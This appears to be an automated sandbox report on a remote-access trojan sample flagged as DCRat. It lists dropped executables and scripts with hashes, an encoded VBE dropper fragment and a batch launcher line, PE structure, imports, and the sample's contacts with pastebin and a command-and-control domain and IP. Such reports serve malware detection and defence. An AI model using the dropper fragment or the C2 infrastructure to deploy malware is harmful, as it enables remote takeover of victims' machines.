              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................F$..6.......d$.. ....$...@.. ........................%...........@..................................d$.K.....$.......................$...................................................... ............... ..H............text....D$.. ...F$................. ..`.sdata.../....$..0...J$.............@....rsrc.........$......z$.............@..@.reloc........$......~$.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\Users\jones\be621495aa6c7b

              Download File
              Process:C:\brokermonitordhcp\portruntime.exe
              File Type:ASCII text, with very long lines (517), with no line terminators
              Category:dropped
              Size (bytes):517
              Entropy (8bit):5.875028721397921
              Encrypted:false
              SSDEEP:12:gfZgoLDnuJWPA5N+hSuW8OLQMGyo/cGakwu3mgDkzCaU6VPUSn:SZgUuIY5NyJMkMGB/cGJL3eLJUSn
              MD5:688278E025372CB867FBBEF00A73809D
              SHA1:A34EFB11DE8B864B43FD125192AF9F561B643440
              SHA-256:ED3A1C95669B95E2F7A572C1B8D6FEEEA3BDF8E17A4476E3638EC8D97467ACF6
              SHA-512:9C025483D73B092A23E8A18C7749764C0A0F703C2367DDFC9EB802867CFAEB38049F1C8B57FE694567C8AD54E852A9C7F51064A319FB9D29A67DB17FC7D8ECCC
              Malicious:false
              Preview:Ot3sLkAVvizjj3RbhK0gdpRJsRl0jB5VcSE7KlLZP0SSbYuCriwgURCictA48JvumdGRyTR69aRnX9sThjJBPYBKQffalRaFEip7SdNXQzh4AYLcAqWZAueNc5ASy0VrALjzTvBEWvua1GJ1UCa44BFUDbeWc4iadz4zzVIPoSDO9EWVvI8waax9FOv2QplbMT6BMUC93KQl70U9FJkT6wADC4tkjQ99rlBpIVIbG93QKLBP4wwHERfaT38RlcZmKQ4Wzo1tAJN62u213eqxd25ZFlWOW00ojQF3QoZP5CH4DihjAHYGvmISVeQOSmXJTjXmo8kOEa1avAWgDxNPct27IxiwYL7Sp7kdL54ChJCUurgUItKfYHqkrZd1ax03djvxa2VH2LrSrhMaQNnoAc4hRAwvbDltTJ1L6t4QYCmMZX2JNClMKL2ApNgZFjqzk89ipBegTWQ8zrH3IniZbZiHQ0gtNeLyWxmbXUdLiE2x54K7FmRcBRXKZ2RzfvTyLblCE

              C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exe

              Download File
              Process:C:\brokermonitordhcp\portruntime.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):2392064
              Entropy (8bit):7.602728589366172
              Encrypted:false
              SSDEEP:49152:i8c1CwZZmO9DQC6pX/PiyS3DAKF6aMS8gRDs6/STCqs82kPq5Xom:i8UCwZZ2rR/Pi1UraxTKTCRem
              MD5:DE91A616A55A97BB434BC118AF3E0E7B
              SHA1:D489795B1A54E11703F50E06F97FBF971446FDE1
              SHA-256:103B85E8B21ECE8CC40D4C9DAF93ED6CAF90C27C2E933CCF9749027AA2FAAB80
              SHA-512:DE5FBC67A1C5936F28A120D176AA7FEC7DF752D1C131B2FBEC4EB57DB3A69445C8708D5DE52FBAC2FF9484285D18E91943C94D51E5437674A9039906F3D1DBBF
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 88%
              • Antivirus: Virustotal, Detection: 68%, Browse
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................F$..6.......d$.. ....$...@.. ........................%...........@..................................d$.K.....$.......................$...................................................... ............... ..H............text....D$.. ...F$................. ..`.sdata.../....$..0...J$.............@....rsrc.........$......z$.............@..@.reloc........$......~$.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\Windows\Downloaded Program Files\be621495aa6c7b

              Download File
              Process:C:\brokermonitordhcp\portruntime.exe
              File Type:ASCII text, with very long lines (301), with no line terminators
              Category:dropped
              Size (bytes):301
              Entropy (8bit):5.772897836532947
              Encrypted:false
              SSDEEP:6:tWjOv8BnFaY66tu1dEMkUbtK1cFxl4LbFGRK3XkJ4nuyn:Ue8/i1dEMdbtK1cIARKHVxn
              MD5:680AA051B21C4D25F0C61EB6CB34A4F1
              SHA1:7A89FBE53815E4271433F2EA6C455C427E163F27
              SHA-256:E1F9F8012E3DBBA85AAD89FAA0D559A0A25A794E7EEAF6F621027196F4B358F5
              SHA-512:EF7F07AEAD0C0B60A5CEDCA9188CAAC97C676DA4C25816B6DAD59B8B37B0EC73DA38E3F729F511E895787377E85A72D6E9A1232541CB134286DD25DF0F9A4448
              Malicious:false
              Preview:ptbdZJs8qXIBtlSgFYScjFEOhMniHT1nhUWrx6caBBiaFupFxT3M5mskpM5MgK0WfedYOktJ51ahhnJwghuyaos4lwCkAQ41KL5kQQ1MjuRDMKDBDIp8ZC60wjwbiIIp7jXVsigPqiOpXosatAh1k5cIPEyreZoammGnxrTemZS0yRcI1VrhlQFBGPGnuzvQ4xCuhEnBrDPKnlU7lqzJsGzWhEgilptxoB6AOskwsp0iA4Yf5IBE9mix8qNdiEaCTcflpTt3FDaCQQVmpAndnpxCcJBheHNnPyPiYw0lZI86L

              C:\brokermonitordhcp\2sqRykCed6LZLP.bat

              Download File
              Process:C:\Users\user\Desktop\QIKiV83Pkl.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):38
              Entropy (8bit):4.080439935112
              Encrypted:false
              SSDEEP:3:I53qTCTVQeOLAEn:IICZMJn
              MD5:5AB5AD6EA2C7E5AB60EF6756FBB4ECB5
              SHA1:7BE45873196B156F9881E35A82605F4E587B7388
              SHA-256:D5EA618EFDAA2D6F994BC244E3870F3951DE0F5786BF6D126C93FF323C924D0F
              SHA-512:CDA69B6B56A4E0C3E8A5316F83A1BD85C2F7D49980377434F43E63355C354E4B4C9A5AD7EE9A34452373A23C3231B07967175231B63D890B33DFDC1CE57071A5
              Malicious:false
              Preview:"C:\brokermonitordhcp\portruntime.exe"

              C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe

              Download File
              Process:C:\brokermonitordhcp\portruntime.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):2392064
              Entropy (8bit):7.602728589366172
              Encrypted:false
              SSDEEP:49152:i8c1CwZZmO9DQC6pX/PiyS3DAKF6aMS8gRDs6/STCqs82kPq5Xom:i8UCwZZ2rR/Pi1UraxTKTCRem
              MD5:DE91A616A55A97BB434BC118AF3E0E7B
              SHA1:D489795B1A54E11703F50E06F97FBF971446FDE1
              SHA-256:103B85E8B21ECE8CC40D4C9DAF93ED6CAF90C27C2E933CCF9749027AA2FAAB80
              SHA-512:DE5FBC67A1C5936F28A120D176AA7FEC7DF752D1C131B2FBEC4EB57DB3A69445C8708D5DE52FBAC2FF9484285D18E91943C94D51E5437674A9039906F3D1DBBF
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 88%
              • Antivirus: Virustotal, Detection: 68%, Browse
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................F$..6.......d$.. ....$...@.. ........................%...........@..................................d$.K.....$.......................$...................................................... ............... ..H............text....D$.. ...F$................. ..`.sdata.../....$..0...J$.............@....rsrc.........$......z$.............@..@.reloc........$......~$.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\brokermonitordhcp\NKrhHlHeQ28n8tUMpitEGWra.vbe

              Download File
              Process:C:\Users\user\Desktop\QIKiV83Pkl.exe
              File Type:data
              Category:dropped
              Size (bytes):209
              Entropy (8bit):5.754247786392974
              Encrypted:false
              SSDEEP:6:GxWvwqK+NkLzWbHa/JUrFnBaORbM5nCSQ1kN1a047:GxFMCzWLauhBaORbQCSQ1u47
              MD5:CD12A9AC9568AF0D511CCF5A17E5A8BA
              SHA1:BE77E6B06727F2B9B3AB93414820D3D0140A8D4F
              SHA-256:39B5E8F5611691FE9AC32CDE9216BC0F2258A241203E158799F1E5B643045E96
              SHA-512:D48EFD007A72295C14068A0BE30FDDE138683119638F441F38171689E896121C91B6E0A363EF9EB0C362C9D4515651B1E801FE77A5FBB256E88FBD033D9552EF
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              Preview:#@~^uAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFT!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z8MW0+DsW.rYKD[t1w&+k;IHVZ.NvdtJnc4mYE~~TBPWl^d+xDoAAA==^#~@.

              C:\brokermonitordhcp\be621495aa6c7b

              Download File
              Process:C:\brokermonitordhcp\portruntime.exe
              File Type:ASCII text, with very long lines (467), with no line terminators
              Category:dropped
              Size (bytes):467
              Entropy (8bit):5.858748287472446
              Encrypted:false
              SSDEEP:12:DY0EeSKG/9pNAgaQQOg+Ay55JQD3d9qBWT:DJdOLNNRJ5SoE
              MD5:C67F61606F6B7678949E5000F58DDEAB
              SHA1:1E9DE8D7D7A84CCAA61B5A353554516CE80F75F5
              SHA-256:2DE95D06F6D0BAD60A796D981750261EC8105089B9838430193DB8F83563C959
              SHA-512:725C0FCA7CD287CC9E466F2D29585967ECECF3CC2E5CCD09F3C855D6182B984B66EBF4E87B9468E1B02CC32B2545CD8E8C88A28823C60345339A810130DE6745
              Malicious:false
              Preview:DvJVxdKGZgjwOllEieL76TZplj2KeMgRTqemDppoMZjNh9KqDWWfczguVeuNk9mMASdhH8A3zgvgtLIlZLHH0AzeKtQj5bDMxXNOgmjFVcq5E9BKWIyY2eW9c9XXrb8XcitW83FwmCwYT3ZLrGNwnoTTANvgPMX4eScfQpLcDBw0r8qjjLpkNMuyOaVvHihZo13Ab45C5utl1dlChM7DgwqSioQzTaVedXL0EpIpQnpdcI6vySN4le32KlcwnFsfYOIeRv81ERw3HNzZrfBAMb38eTpcNVBL4KEOAbdDUW0Ts9u7wCEIErT7UJA7GfotQl96JkZQB7qzkkQeirpKQ3HM1G31bg7zrHDGAyxLnyHHBdWu2fZYzecWewFDriyf90IdhJdu4ehcwALXtI85Gj9NoqmOsteF9mHKU3NsCodV6AkdlsUij3YZ15z0hPCK9ccJ2AC04Q3cGoQoFJn

              C:\brokermonitordhcp\portruntime.exe

              Download File
              Process:C:\Users\user\Desktop\QIKiV83Pkl.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):2392064
              Entropy (8bit):7.602728589366172
              Encrypted:false
              SSDEEP:49152:i8c1CwZZmO9DQC6pX/PiyS3DAKF6aMS8gRDs6/STCqs82kPq5Xom:i8UCwZZ2rR/Pi1UraxTKTCRem
              MD5:DE91A616A55A97BB434BC118AF3E0E7B
              SHA1:D489795B1A54E11703F50E06F97FBF971446FDE1
              SHA-256:103B85E8B21ECE8CC40D4C9DAF93ED6CAF90C27C2E933CCF9749027AA2FAAB80
              SHA-512:DE5FBC67A1C5936F28A120D176AA7FEC7DF752D1C131B2FBEC4EB57DB3A69445C8708D5DE52FBAC2FF9484285D18E91943C94D51E5437674A9039906F3D1DBBF
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 88%
              • Antivirus: Virustotal, Detection: 68%, Browse
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................F$..6.......d$.. ....$...@.. ........................%...........@..................................d$.K.....$.......................$...................................................... ............... ..H............text....D$.. ...F$................. ..`.sdata.../....$..0...J$.............@....rsrc.........$......z$.............@..@.reloc........$......~$.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

              \Device\Null

              Download File
              Process:C:\Windows\System32\w32tm.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):151
              Entropy (8bit):4.777828636831807
              Encrypted:false
              SSDEEP:3:VLV993J+miJWEoJ8FXgKtR96SfTrN1dJFAX6rv:Vx993DEUctR96SPxN
              MD5:7FC16AE4EB072CD4234F1C814467B7BF
              SHA1:07823630BC6DA6CF68ADD825BB35828EBEB78C2D
              SHA-256:20A5E55CAB868071934BEFCD205102BBCD42A10160F91E7996BAA4A47CABB707
              SHA-512:77E5C9EFE3FE4F48BA353DB1DD3D02491235344BC0B904C1C9DA87B560254D49D66522CAC68FC6CECCBAF480C9EEDCA5B4DC22A6EAAFE6F1A5417FC69200B877
              Malicious:false
              Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 27/07/2024 07:10:47..07:10:47, error: 0x800705B4.07:10:53, error: 0x800705B4.

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):7.459746383766598
              TrID:
              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
              • Win32 Executable (generic) a (10002005/4) 49.97%
              • Generic Win/DOS Executable (2004/3) 0.01%
              • DOS Executable Generic (2002/1) 0.01%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:QIKiV83Pkl.exe
              File size:2'777'219 bytes
              MD5:2c00ebc767b339c3baf6bcf3086edf51
              SHA1:fd1aac21bf1604a175e1d87fa174d832503e3a79
              SHA256:67e022273972cda8e1633f002043e4f03cc62bf603bfc95dd5c78af8c0cfb5d2
              SHA512:6a93dc3059d6d293701aea06b368cfb9c7e807bcbbf93a34b62cc7b7541ce4b9c831ac270a19e1fb3b1dcc1a27425ed84796a5a435e6920de52610114a6462a8
              SSDEEP:49152:MbA37V8c1CwZZmO9DQC6pX/PiyS3DAKF6aMS8gRDs6/STCqs82kPq5Xom5:Mb68UCwZZ2rR/Pi1UraxTKTCRem5
              TLSH:54D5BE017E48B951E41816F7C3EF45044BB4A8D026B6E7DB7AB93F6D26163D22C0CADB
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..

              File Icon

              Icon Hash:0f33a8b286230f8c

              Static PE Info

              General

              Entrypoint:0x41ec40
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Time Stamp:0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:5
              OS Version Minor:1
              File Version Major:5
              File Version Minor:1
              Subsystem Version Major:5
              Subsystem Version Minor:1
              Import Hash:fcf1390e9ce472c7270447fc5c61a0c1

              Entrypoint Preview

              Instruction
              call 00007F84409CCF59h
              jmp 00007F84409CC96Dh
              cmp ecx, dword ptr [0043E668h]
              jne 00007F84409CCAE5h
              ret
              jmp 00007F84409CD0DEh
              int3
              int3
              int3
              int3
              int3
              push ebp
              mov ebp, esp
              push esi
              push dword ptr [ebp+08h]
              mov esi, ecx
              call 00007F84409BF877h
              mov dword ptr [esi], 00435580h
              mov eax, esi
              pop esi
              pop ebp
              retn 0004h
              and dword ptr [ecx+04h], 00000000h
              mov eax, ecx
              and dword ptr [ecx+08h], 00000000h
              mov dword ptr [ecx+04h], 00435588h
              mov dword ptr [ecx], 00435580h
              ret
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              lea eax, dword ptr [ecx+04h]
              mov dword ptr [ecx], 00435568h
              push eax
              call 00007F84409CFC7Dh
              pop ecx
              ret
              push ebp
              mov ebp, esp
              sub esp, 0Ch
              lea ecx, dword ptr [ebp-0Ch]
              call 00007F84409BF80Eh
              push 0043B704h
              lea eax, dword ptr [ebp-0Ch]
              push eax
              call 00007F84409CF392h
              int3
              push ebp
              mov ebp, esp
              sub esp, 0Ch
              lea ecx, dword ptr [ebp-0Ch]
              call 00007F84409CCA84h
              push 0043B91Ch
              lea eax, dword ptr [ebp-0Ch]
              push eax
              call 00007F84409CF375h
              int3
              jmp 00007F84409D13C3h
              jmp dword ptr [00433260h]
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              push 00421EB0h
              push dword ptr fs:[00000000h]

              Rich Headers

              Programming Language:
              • [ C ] VS2008 SP1 build 30729
              • [IMP] VS2008 SP1 build 30729
              • [C++] VS2015 UPD3.1 build 24215
              • [EXP] VS2015 UPD3.1 build 24215
              • [RES] VS2015 UPD3 build 24213
              • [LNK] VS2015 UPD3.1 build 24215

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x3c8200x34.rdata
              IMAGE_DIRECTORY_ENTRY_IMPORT0x3c8540x3c.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x630000x1e8c8.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x820000x2268.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0x3aac00x54.rdata
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355080x40.rdata
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x330000x260.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3bdc40x120.rdata
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x310ea0x31200c5bf61bbedb6ad471e9dc6266398e965False0.583959526081425data6.708075396341128IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rdata0x330000xa6120xa8007980b588d5b28128a2f3c36cabe2ce98False0.45284598214285715data5.221742709250668IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0x3e0000x237280x1000201530c9e56f172adf2473053298d48fFalse0.36767578125data3.7088186669877685IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .didat0x620000x1880x200c5d41d8f254f69e567595ab94266cfdcFalse0.4453125data3.2982538067961342IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc0x630000x1e8c80x1ea00aa69ae8bca206c0daaa43c0544690fcaFalse0.19543207908163265data3.7734005483467628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc0x820000x22680x2400c7a942b723cb29d9c02f7c611b544b50False0.7681206597222222data6.5548620101740545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

              Resources

              NameRVASizeTypeLanguageCountryZLIB Complexity
              PNG0x636140xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
              PNG0x6415c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
              RT_ICON0x657080x1945PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9799041582933993
              RT_ICON0x670500x10828Device independent bitmap graphic, 128 x 256 x 32, image size 655360.040547734532118775
              RT_ICON0x778780x4228Device independent bitmap graphic, 64 x 128 x 32, image size 163840.08650212564950402
              RT_ICON0x7baa00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.1204356846473029
              RT_ICON0x7e0480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.174718574108818
              RT_ICON0x7f0f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.3333333333333333
              RT_DIALOG0x7f5580x286dataEnglishUnited States0.5092879256965944
              RT_DIALOG0x7f7e00x13adataEnglishUnited States0.60828025477707
              RT_DIALOG0x7f91c0xecdataEnglishUnited States0.6991525423728814
              RT_DIALOG0x7fa080x12edataEnglishUnited States0.5927152317880795
              RT_DIALOG0x7fb380x338dataEnglishUnited States0.45145631067961167
              RT_DIALOG0x7fe700x252dataEnglishUnited States0.5757575757575758
              RT_STRING0x800c40x1e2dataEnglishUnited States0.3900414937759336
              RT_STRING0x802a80x1ccdataEnglishUnited States0.4282608695652174
              RT_STRING0x804740x1b8dataEnglishUnited States0.45681818181818185
              RT_STRING0x8062c0x146dataEnglishUnited States0.5153374233128835
              RT_STRING0x807740x446dataEnglishUnited States0.340036563071298
              RT_STRING0x80bbc0x166dataEnglishUnited States0.49162011173184356
              RT_STRING0x80d240x152dataEnglishUnited States0.5059171597633136
              RT_STRING0x80e780x10adataEnglishUnited States0.49624060150375937
              RT_STRING0x80f840xbcdataEnglishUnited States0.6329787234042553
              RT_STRING0x810400xd6dataEnglishUnited States0.5747663551401869
              RT_GROUP_ICON0x811180x5adata0.7666666666666667
              RT_MANIFEST0x811740x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

              Imports

              DLLImport
              KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
              gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

              Possible Origin

              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States

              Network Behavior

              Suricata IDS Alerts

              TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
              2024-07-27T11:37:33.132074+0200TCP2034194ET MALWARE DCRAT Activity (GET)4970680192.168.2.75.101.153.57
              2024-07-27T11:37:33.969083+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434970540.68.123.157192.168.2.7
              2024-07-27T11:38:12.236267+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971140.68.123.157192.168.2.7

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Jul 27, 2024 11:37:31.239613056 CEST49704443192.168.2.7172.67.19.24
              Jul 27, 2024 11:37:31.239655018 CEST44349704172.67.19.24192.168.2.7
              Jul 27, 2024 11:37:31.240503073 CEST49704443192.168.2.7172.67.19.24
              Jul 27, 2024 11:37:31.252614975 CEST49704443192.168.2.7172.67.19.24
              Jul 27, 2024 11:37:31.252626896 CEST44349704172.67.19.24192.168.2.7
              Jul 27, 2024 11:37:31.738928080 CEST44349704172.67.19.24192.168.2.7
              Jul 27, 2024 11:37:31.738996983 CEST49704443192.168.2.7172.67.19.24
              Jul 27, 2024 11:37:31.743336916 CEST49704443192.168.2.7172.67.19.24
              Jul 27, 2024 11:37:31.743356943 CEST44349704172.67.19.24192.168.2.7
              Jul 27, 2024 11:37:31.743792057 CEST44349704172.67.19.24192.168.2.7
              Jul 27, 2024 11:37:31.798994064 CEST49704443192.168.2.7172.67.19.24
              Jul 27, 2024 11:37:31.840507984 CEST44349704172.67.19.24192.168.2.7
              Jul 27, 2024 11:37:32.295350075 CEST44349704172.67.19.24192.168.2.7
              Jul 27, 2024 11:37:32.295425892 CEST44349704172.67.19.24192.168.2.7
              Jul 27, 2024 11:37:32.295523882 CEST49704443192.168.2.7172.67.19.24
              Jul 27, 2024 11:37:32.301585913 CEST49704443192.168.2.7172.67.19.24
              Jul 27, 2024 11:37:32.376226902 CEST4970680192.168.2.75.101.153.57
              Jul 27, 2024 11:37:32.382529020 CEST80497065.101.153.57192.168.2.7
              Jul 27, 2024 11:37:32.382600069 CEST4970680192.168.2.75.101.153.57
              Jul 27, 2024 11:37:32.382734060 CEST4970680192.168.2.75.101.153.57
              Jul 27, 2024 11:37:32.387579918 CEST80497065.101.153.57192.168.2.7
              Jul 27, 2024 11:37:33.129066944 CEST80497065.101.153.57192.168.2.7
              Jul 27, 2024 11:37:33.132074118 CEST4970680192.168.2.75.101.153.57
              Jul 27, 2024 11:37:33.137789011 CEST80497065.101.153.57192.168.2.7
              Jul 27, 2024 11:37:33.359345913 CEST80497065.101.153.57192.168.2.7
              Jul 27, 2024 11:37:33.368586063 CEST4970680192.168.2.75.101.153.57

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Jul 27, 2024 11:37:31.228872061 CEST6482853192.168.2.71.1.1.1
              Jul 27, 2024 11:37:31.235738039 CEST53648281.1.1.1192.168.2.7
              Jul 27, 2024 11:37:32.311815023 CEST5009253192.168.2.71.1.1.1
              Jul 27, 2024 11:37:32.375680923 CEST53500921.1.1.1192.168.2.7

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Jul 27, 2024 11:37:31.228872061 CEST192.168.2.71.1.1.10x86ffStandard query (0)pastebin.comA (IP address)IN (0x0001)false
              Jul 27, 2024 11:37:32.311815023 CEST192.168.2.71.1.1.10x33f9Standard query (0)romangw5.beget.techA (IP address)IN (0x0001)false

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Jul 27, 2024 11:37:31.235738039 CEST1.1.1.1192.168.2.70x86ffNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
              Jul 27, 2024 11:37:31.235738039 CEST1.1.1.1192.168.2.70x86ffNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
              Jul 27, 2024 11:37:31.235738039 CEST1.1.1.1192.168.2.70x86ffNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
              Jul 27, 2024 11:37:32.375680923 CEST1.1.1.1192.168.2.70x33f9No error (0)romangw5.beget.tech5.101.153.57A (IP address)IN (0x0001)false
              Jul 27, 2024 11:37:33.188515902 CEST1.1.1.1192.168.2.70x1accNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
              Jul 27, 2024 11:37:33.188515902 CEST1.1.1.1192.168.2.70x1accNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

              HTTP Request Dependency Graph

              • pastebin.com
              • romangw5.beget.tech

              HTTP Packets

              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.7497065.101.153.57801532C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe
              TimestampBytes transferredDirectionData
